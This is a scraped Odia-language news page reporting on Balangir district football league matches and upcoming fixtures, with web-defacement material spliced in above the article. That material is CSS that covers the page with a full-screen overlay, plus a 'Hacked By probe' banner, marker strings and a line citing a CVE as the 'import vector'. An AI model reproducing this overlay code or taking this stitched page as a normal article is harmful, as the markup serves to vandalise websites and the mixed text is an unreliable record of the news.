html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ବଲାଙ୍ଗିର ଫୁଟ୍ବଲ ଲିଗ୍:  ବ୍ଳୁମାଉଣ୍ଟେନ ଓ ନକ୍ଟାସର ଡ୍ର, ଇଲେଭେନ ଷ୍ଟାର ବିଜୟୀ

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ବଲାଙ୍ଗିର,୯ା୯- ବଲାଙ୍ଗିର ଜିଲ୍ଲା କ୍ରୀଡା ସଂସଦ ତରଫରୁ ଆୟୋଜିତ ବଲାଙ୍ଗିର ଫୁଟବଲ ଲିଗ ୨ ଗୋଟି ପଡିଆରେ ଅନୁଷ୍ଠିତ  ହୋଇଯାଇଛି । ପଲ୍ଲିଶ୍ରୀ ଷ୍ଟାଡିୟମ ସଦାଇପାଲି ଠାରେ ଅନୁଷ୍ଠିତ   ଲିଗ୍ ମ୍ୟାଚରେ ଇଲେଭେନ ଷ୍ଟାର ୧-୦ ଗୋଲରେ ଅମାମୁଣ୍ଡା କୁ ହରାଇ ବିଜୟୀ ହୋଇଛି । ବିଜୟୀ ଦଳ ତରଫରୁ ଚୁଡାମଣି ସାଗରିଆ ଗୋଟିଏ ଗୋଳ ଦେଇଥିଲେ । ଫାଓ ଓଡିଶା ତଥା ଜିଲ୍ଲା କ୍ରୀଡାସଂସଦ କାର୍ଯ୍ୟକାରୀ ସଭାପତି ଡ. ଶ୍ରୀକର ମିଶ୍ରଙ୍କ ତତ୍ୱାବଧାନରେ ଅନୁଷ୍ଠିତ   ଖେଳରେ କ୍ରୀଡାସଂସଦର ସହ ସମ୍ପାଦକ ପ୍ରଭାତ କୁମାର ମିଶ୍ର, କ୍ରୀକେଟ ସମ୍ପାଦକ ଓମପ୍ରକାଶ ଚାନ୍ଦ, ଭଲିବଲ ସମ୍ପାଦକ ପ୍ରଦ୍ୟୁମ୍ନ  କୁମାର ମିଶ୍ର ଓ କ୍ରୀଡା ସଂସଦର ବରିଷ୍ଠ  ସଦସ୍ୟ ଜୟରାମ ମିଶ୍ର ଅତିଥିଭାବରେ ଯୋଗଦେଇଥିଲେ । କ୍ରୀଡାସଂସଦର ଉପ ସଭାପତି କୃଷ୍ଣଚନ୍ଦ୍ର ମିଶ୍ର, କ୍ରୀଡାବିତ ସୁଧିର ଚନ୍ଦ୍ର ପଣ୍ଡା, କ୍ରୀଡାସଂସଦର ବରିଷ୍ଠ  ସଦସ୍ୟ ଡ. ସିଦ୍ଧେଶ୍ୱର  ମିଶ୍ର ଓ ବଲାଙ୍ଗିର ବ୍ଳକ ଅଧ୍ୟକ୍ଷ ଗୋଳାପ ବାଗ ମଂଚାସୀନ ଥାଇ ଖେଲାଳି ମାନଙ୍କୁ ଉତ୍ସାହିତ କରିଥିଲେ । ଖେଳକୁ ଶରତ ନନ୍ଦ,  ସୁରେଶ ନାଏକ, ସୁଧାସୁଂ ସେଠ ଓ ଖଲିଉଲ ରହମାନ ପରି·ଳନା କରିଥିଲେ । 

ମିଶନ ପଡିଆ ଠାରେ ଅନୁଷ୍ଠିତ   ସୁପର ଲିଗ୍ ଖେଳରେ ନକ୍ଟାସର ବନାମ ବ୍ଳୁମାଉଣ୍ଟେ ଖେଳ ୧-୧ ଗୋଲରେ ଡ୍ର ରହିଥିଲା । ନକ୍ଟାସର ପକ୍ଷରୁ ସୁରେଶ ଭୋଇ ଓ ବ୍ଳୁ ମାଉଣ୍ଟେନ ଦଳର ସଜିଂବ ଦିପ ଗୋଲ ସ୍କୋର କରିଥିଲେ । ଖେଳକୁ ଦେବରାଜ ନାହାକ, ସୁଦୟ ବାରିକ, ଦେବାଶିଷ ବାଗ ଓ ନିସାରକାନ୍ତ ନାଗ ପରି·ଳନା କରିଥିଲେ ।  ୧୧ ତାରିଖ ମଙ୍ଗଲବାର ପଲ୍ଲିଶ୍ରୀ ଷ୍ଟାଡିୟମ ସଦାଇପାଲିଠାରେ ଏପିଜେ ଲୋଇସିଂହା ବନାମ ବ୍ଳୁ ମାଉଣ୍ଟେନ, ଓ ମିଶନ ପଡିଆରେ ବିଏନଏଏ ଜରାସିଂହା ବନାମ ପାଟଣେଶ୍ୱରୀ କ୍ଳବ ପାଟଣାଗଡ ମଧ୍ୟର ଖେଳ ହେବ ବୋଲି କ୍ରୀଡାସଂସଦ ପକ୍ଷରୁ ସାଧାରଣ ସମ୍ପାଦକ ହରିନାରାୟଣ ପୁଜାରୀ ଜଣାଇଛନ୍ତି । 

0
0
0
s2sdefault